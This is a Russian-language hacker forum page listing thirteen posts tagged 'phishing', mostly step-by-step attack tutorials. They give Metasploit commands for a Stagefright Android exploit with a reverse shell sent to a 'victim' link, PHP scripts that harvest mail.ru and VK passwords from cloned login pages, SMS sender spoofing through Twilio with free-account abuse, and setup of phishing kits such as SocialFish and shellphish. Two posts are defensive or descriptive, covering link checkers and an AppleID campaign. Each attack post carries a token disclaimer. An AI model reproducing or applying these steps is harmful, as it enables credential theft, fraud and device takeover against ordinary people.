Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'фишинг'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 13 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете создать фейковые переписки в Iphone. Подобные липовые скриншоты могут пригодиться, если вам нужно что-либо доказать, или же вы просто хотите разыграть своих друзей. Представляем вашему вниманию сервис под названием ScreenChat → ТЫК ←. Он позволит вам быстро подделать переписку в мессенджере айфона. Сервис обладает простеньким, но в то же время приятным для пользования интерфейсом, поэтому им очень приятно и легко пользоваться, разобраться будет не сложно. Погнали! 1. Первым делом вам нужно выбрать того, кто первый написал сообщение. 2. Затем отредактировать настройки, а именно оператора, время, качество соединения с wi-fi и имя собеседника. 3. После этого вам остается только создать саму переписку и скачать полученный результат. Вот таким простым способом вы можете подделать переписку в Iphone и использовать ее в каких-то своих целях. На данный момент нет способа сделать это проще и эффективнее, поэтому используйте этот сервис и не ищите себе проблем. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством. Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий. Приступим: 1. Первым делом устанавливаем нашу утилиту в Termux: update apt upgrade pkg install unstable-repo pkg install Metasploit 2. После этого запускаем утилиту: 3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда →ТЫК← и перекидываем в папку с эксплоитами. 4. После этого прописываем: msfconsole — открытие консоли use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита set SRVHOST вашIP URIPATH / set PAYLOAD linux/armle/mettle/reversetcp set LHOST вашIP set VERBOSE true exploit -j — запуск эксплоита Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Друзья, всех приветствую! В этой статье я хочу рассказать о подмене номера отправителя СМС и о подмене номера звонящего, более известных в интернете, как senderid spoofing и callerid spoofing. SenderID Spoofing мы можем видеть очень часто: когда при создании аккаунта мы вводим номер телефона, то нам приходит смска, часто от имени компании где мы заводим аккаунт. CallerID Spoofing встречается реже, но клиенты сбербанка могут помнить, что с номера 900 им может позвонить бот. Подмена сообщений Разберем метод подделки отправителя, мы сможем отправлять SMS от имени компаний в несколько кликов. Twilio Очень эффективный метод для крупной фишинговой атаки. Первым делом регистрируемся с помощью новой почты и левого номера телефона(можно публичного виртуального) и заходим в аккаунт.Присылать СМС с названием компании вместо номера можно в большинстве стран, но не во всех.В России нужно попросить у тех поддержки зарегестрировать senderid(это небольшая проблема) с помощью формы, это займет от дня до недели.Если регистрация для страны не требуется, пропускаем предыдущий пункт.Берём простенький код на Python:from twilio.rest import Client account_sid = 'СИД АККАУНТА' auth_token = 'ТОКЕН' client = Client(account_sid, auth_token) message = client.messages.create(body='Привет!', from_='ОТПРАВИТЕЛЬ', to='ПОЛУЧАТЕЛЬ') print(message.sid) Токен и SID смотрим в консоли twilio из Project INFO(Console | Twilio)Теперь нам нужно апгрейднуть аккаунт, в правом верхнем углу будет баланс, а рядом "Upgrade", жмём и вводим левые данные.Как только нас просят оплатить, переключаемся на промокод и вводим TWILIOQUEST, получаем бесплатно платный аккаунт.Теперь можем запускать код, который я привел в статье ранее.Получаем сообщение от QIWI: Вместо безобидного приветствия там могла быть фишинговая ссылка. При проделанных действиях будет так-же отображаться история сообщений от настоящего QIWI Такая атака практически не используется хакерами, а зря. Ведь даже просвященный юзер, с довольно-таки большой вероятностью, может попасться на это. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной статье я хочу рассказать вам о различных интересных сервисах которые позволят вам улучшить свою анонимность и безопасность в сети, а именно: 1. Расшифровать любые сокращенные ссылки, не переходя по ним. 2. Проверять гиперссылки на наличие вирусов или фишинга. 3. Проверять анонимность своего браузера/соединения. Начнём! Расшифровка сокращенных ссылок: 1. iplogger → https://iplogger.org/url-checker/ ←. 2. checkshorturl → http://checkshorturl.com/ ←. 3. unshorten → https://unshorten.me/ ←. 4. untinyurl → http://www.trueurl.net/ ←. Проверка гиперссылок на вирусы и фишинг: 1. scanurl → https://scanurl.net/ ←. 2. vms drweb → https://vms.drweb.ru/online/ ←. 3. virusdesk kaspersky → https://opentip.kaspersky.com/ ←. 4. virustotal → https://www.virustotal.com/gui/ ←. Проверка анонимности браузера/соединения: 1. coveryourtracks → https://coveryourtracks.eff.org/ ←. 2. webkay robinlinus → https://webkay.robinlinus.com/ ←. 3. amiunique → https://amiunique.org/fp ←. 4. proxy6 → https://proxy6.net/privacy ←. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! Да, фишинг всё ещё актуален и будет оставаться таковым и в 2021 году. RevoltShing - это достаточно хороший инструмент для осуществления фишинг-атаки. Данная утилита способна скопировать практически любой сайт. Из плюсов могу подчеркнуть приятное оформление, а также после ввода данных жертва попадает на оригинальную страницу сайта. Установка: 1. Устанавливаем репозиторий GitHub: git clone https://github.com/AngelSecurityTeam/RevoltShing 2. Переходим в директорию утилиты и устанавливаем компоненты: cd RevoltShing pip install requests pip install bs4 pip install whether Запуск: python Server.py python revoltshing.py Установка завершена. Но на этом не всё, вот дальнейший небольшой мануал: система по стандарту предложит клонировать сайт Банка Америки. Поменять настройки можно командой: edit url https:// Перенаправление меняется командой: edit url_destination https:// Для старта вписываем: start Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Начнем с создания клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы, такие как картинки, аудио файлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого нам нужно изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там. Для примера попробуем создать реплику сайта страницы авторизации Mail. Её адрес https://account.mail.ru/login, чтобы нам просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в Linux есть более простое решение. В консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидим, то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальном сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами: source /etc/apache2/envvars systemctl restart apache2 После того как приветственная страница отображается, нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php". Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда: <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> Пояснение file_put_contents - функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим: mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправляем её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда: header('Location: https://account.mail.ru/login?fail=1'); В общем ничего сложного и все уже готово. Пробуем зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.txt Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Привет, хакер, технически процесс можно разделить на два простых этапа: Подготовка копии сайта Нахождение способа заставить жертву перейти на фэйковый сайт. Отойдем к теории, фишинг прибыльная тема. С помощью фишинга проворачиваются классовые взломы и точечные. На самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фэйковый сайт и ввели свои данные. Все решает социальная инженерия. Начнем с создания клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. В коде сайта могут быть ссылки на сторонние ресурсы: картинки, аудиофайлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки. Нужно изменить логику работы приложения, чтобы данные отправлялись на сервер и сохранялись там. Для примера попробуем создать реплику сайта страницы авторизации Mail. Её адрес https://account.mail.ru/login, для просмотра исходного кода страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Не надо вручную всё копировать и сохранять все картинки: в Linux есть более простое решение. В консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login В папке, с открытой консолью, появится папка account.mail.ru с файлом login. Открыв в браузере, увидим то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальным сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами source /etc/apache2/envvars systemctl restart apache2 Когда приветственная страница отображается, нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php". Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> file_put_contents функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправим её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда. header('Location: https://account.mail.ru/login?fail=1'); Вообщем ничего сложного и все уже готово. Пробуем зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.tx
  8. Привет, хакеры, в данной статье приведу пример создания фишингового сайта для социальной сети вконтакте. Открываем браузер, заходим по адресу vk.com, Жмем ПКМ => Сохранить как => Имя файла: index.html Тип файла: Веб – страница полностью. Жмем кнопку "Сохранить". Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его BLACK.php Открываем блокнот и вставляем туда этот код. $Login = $_POST[zabor]; // Логин жертвы $Pass = $_POST[‘zena’]; // Пароль жертвы $log = fopen(“ups.php”,”a+”); //тут будут лежать пароли жертв fwrite($log,” $Login:$Pass \n”); //производим запись в ups.php fclose($log); //закрывает ups.php echo “http://vkontakte.ru’>”;// перенаправляем жертву на http://vk.com ?> Закрываем и сохраняем как BLACK.php Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим Он найдет строчку: https://login.vk.com/?act=login”method=”POST”> Меняем её на это: Дальше, смотрим чуть ниже и находим строчку: Меняем на это: Смотрим ниже и находим строчку: Меняем: Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, находим закрывающийся тег , вырезаем его и вставляем тут. Войти Сохраняем index.html, получилось два файла и одна папка. Дальше это дело нужно залить на хостинг. Этим https://beget.com можно месяц бесплатно пользоваться, можно купить, 165 рублей. Когда жертва зайдет на страничку фишинговую, введет «логин» и «пароль», создаться на хостинге файл, ups.php в нем и будут храниться учетные записи. Статья написана исключительно в ознакомительных целях!
  9. О, брат, ты снова зашёл на мою статью? Окей, значит ты зашёл именно туда, куда нужно. Сейчас я хочу познакомить с фишинговым инструментом SocialFish. Он позволяет легко создавать фейк-страницы самых популярных веб-сайтов, таких как Instagram, Twitter, Github и т.д. Установка Клонируй это из Github в Termux. git clone https://github.com/An0nUD4Y/SocialFish.git Перейди в папку SocialFish, установите требования, измените режим файла python и выполните: cd SocialFish apt install python3-pip // Если не установлено pip3 install -r requirements.txt // Если не установлено chmod 777 SocialFish.py ./SocialFish.py Возможно, у вас появится вот такая ошибка. Если она у вас появилась, то делаем следующее: pkg up pkg install curl pkg install php Соглашаемся и продолжаем: После установки мы запускаем SocialFish заново и соглашаемся: После того, как вы ответите на вопросы, вы увидите доступные варианты страниц: FACEBOOK PHISHINGИНСТАГРАМ ФИШИНГСНАПЧАТ ФИШИНГYAHOO PHISHINGДВИЖЕНИЕ ФИШИНГАMICROSOFT PHISHINGПАРНЫЙ ФИШИНГВК ФИШИНГICLOUD ФИШИНГ Можете использовать любой. Ничего сложно в этом нет. Предупреждаю, что данная статья предназначена лишь для ознакомления и не призывает к действиям.
  10. Привет, хакеры, в данной статье немного поговорим о фишинге социальный сетей. Предупреждаю, что статья несет цель лишь обозрить подобные процессы, для улучшения вашей же безопасности. Меню Работа в данной программе предельно проста и разобраться с ее управлением не сложно, несколько проблем рассмотрим дальше. Данный софт спредоставляет множество различных сайтов, однако выбор падет на гитхаб. Следующий пункт Есть два варианта на выбор: Serveo и Ngrok - хосты, на которых разместится сайт. Первым делом необходимо запустить в локальной сети, после в зависимости от выбранного варианта выбирается хост. Какой лучше выбрать? Лично я рекомендую использовать ngrok, легкий в управлении Ответ программы В строке “Send this link to the Victim” и будет написанная ссылка, которая ведет на фишинговый сайт. Она не красивая, но зато абсолютно бесплатно и быстро. Дальнейшей целью является отправление ссылки жертве. Работоспособность Переходим по ссылке и проверяем ее. Вводим данные и нажимаем на “Sign in” Далее, переходим в программу и наблюдаем данные для входа: логин и пароль. Данные получены. Заключение По щелчку пальца невозможно получить любые данные, однако используя эту информацию и навыки социальной инженерии, можно получить необходимую информацию.
  11. Привет, хочу рассказать в данной статье как андроид устройство легко превращается в мощный инструмент для фишинга. Фишинг – подмена данных, для заполучения личной информации пользователя. Для этого понадобится программа – kali linux-weeman. Сейчас вы подумали, что за хрень, ведь я говорил об андройде. Все верно, первым делом устанавливаем пожалуй лучшую консоль для андроида – termux. Он является одним из лучших эмуляторов линукса. После скачивания открываем его. Для повышения комфорта работы устанавливаем Hacker’s Keyboard. Для подготовки к установке прописываем в termux несколько команд: $ apt update $ apt install Необходимо стабильное интернет-подключение, от этого будет зависеть скорость выполнения операции, после этого прописываем: $ apt install git Как мы видим у нас появляется вопрос, хотите ли вы продолжить? Для согласия пишем букву – y. Переходим к следующей команде: $ apt install python2 Появляется абсолютно такой же вопрос, на него тоже нужно дать согласие. Данная команда устанавливает язык программирования – python, именно он позволяет работать программе weeman. Подготвка к установке завершена, устанавливаем weeman: $ git clone https://github.com/evait-security/weeman Далее прописываем: $ ls Видим содержимое каталогов: После ввода команды не появилось никаких надписей? Вам стоит заново пройтись по предыдущим пунктам, если все работает, переходим дальше: $ cd weeman $ ls Образовались данные файлы, стартуем weeman $ python2 weeman.py Успешная установка, переходим к следующим пунктам. Необходимо вывести консоль, делается при помощи данного кода: $ help Далее устанавливаются определенные настройки, делаю на примере Yandex Вводим несколько строк: $ set url https://yandex.ru $ set port 8080 $ set action_url https://yandex.ru Первая команда необходима для установки адреса сайта, который будет скопирован. Вторая команда нужна для установки порта. Третья строка выбирает адрес, на который будет произведена переадресовка жертвы. Для проверки настроек прописываем этот код: $ show Далее запускаем: $ run Как мы видим все работает, адрес сервера. Копируем данный адрес и прописываем в браузере. Предупреждаю, что вся информация предоставлена лишь для ознакомления, не призываю к действиям. За выполнение подобных схем вы можете понести реальное уголовное наказание, поэтому выполняйте подобные действия лишь на свой страх и риск.
  12. Всем привет, сейчас я вам хочу рассказать о том, как же можно очень быстро создать фишинговый сайт. Кто незнаком с этим понятием – то прошу ознакомиться, а если говорить проще, то это поддельный сайт. Итак, для работы на понадобится операционная система Kali Linux, после чего надо открыть ее консоль и ввести данную команду: git clone https://github.com/thelinuxchoice/shellphish Отлично, теперь здесь нам надо прописать данные команды: cd shellphish bash shellphish.sh Теперь из предложенных вариантов фишинговых сайтов мы должны выбрать нам необходимый. В качестве примера мною будет выбран фишинговый сайт для Инстаграм. Нам на выбор будет предоставлено несколько способов, я же выберу способ под номером 01, после чего нам нужно будет прописать порт, в случае его отсутствия – пропустить его ввод. Итак, мы видим данную ссылку, нам необходимо ее скопировать и вставить в адресную строку. Как вы видите, фейковая страничка была успешно создана, переходя по которой жертва введет свои данные для входа в аккаунт. После этого жертву перекидывает на официальный сайт инстаграм, если че пользователь уже был авторизован, то сразу же будет открыта его страничка в соц. сети. В то время как жертва отправляем нам свои данные, мы их получаем прямо в консоли, где мы может узнать IP, местонахождение и так далее. А вот после непосредственного нажатия кнопки входа мы получим данные вида: логин и пароль. Как вы видите это занимает кране много времени, но это не меняет того, что данный метод взлома страничек является очень эффективным.
  13. Фишинг-атака на AppleID Зафиксирована довольно мощная фишинг-кампания против пользователей «яблочной» техники. Кампания по давно уже любимому методу распространяется с помощью спама. Письмо имеет тему, как правило, передающей смысл о том, что произошла ошибка, например, при проведении платежа с applepay. https://pp.userapi.com/c840235/v840235209/7328c/UNw_9N0TNYU.jpg Тело письма в вложением PDF В фишинговом письме приложен PDF-документ, в котором говорится, что «некоторые Ваши данные в профиле AppleID устарели или неверны», необходимо бы их обновить: https://pp.userapi.com/c840235/v840235209/732b0/ZnvIMHkuR84.jpg Тело PDF-вложения. Нет активного содержимого, только 1 ссылка. В принципе, есть и логотип, и подписи. Выдает неоригинальность письма лишь отвратительное качество картинки, видимо, это сделано с целью обхода графических анализаторов спама. Итак, кликнув по ссылке «My Account» пользователя переадресует на фишинговый ресурс, который, в отличие от письма, сделан качественно, и очень сложно отличить от настоящего сайта. https://pp.userapi.com/c840235/v840235209/732f2/80ZzwbmnF_c.jpg Поддельный сайт Apple Если пользователь не заметит разницы и «попадется на крючок», введенные данные отправятся злоумышленникам, и после этой формы авторизации появится еще одна, где мошенники постараются собрать максимально возможную информацию о пользователе. Оперируя такими данными, мошенники смогут получить доступ к Вашему AppleID, iCloud, файлам, документам, медицинской карте (в России как-то не развито такое пока), смогут заблокировать Ваше устройство удаленно и потребовать выкуп за восстановление. Дополнительно можно сказать о сайте то, что сайт весьма неплохо защищен от срабатывания эвристических анализаторов: практически вся начинка страницы зашифрована AES, и прогружается только с помощью расшифровки «налету» из enc.js скрипта. https://pp.userapi.com/c840235/v840235209/73303/Lqsk2XcZyww.jpg Зашифрованная «начинка» страницы и код для дешифровки.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.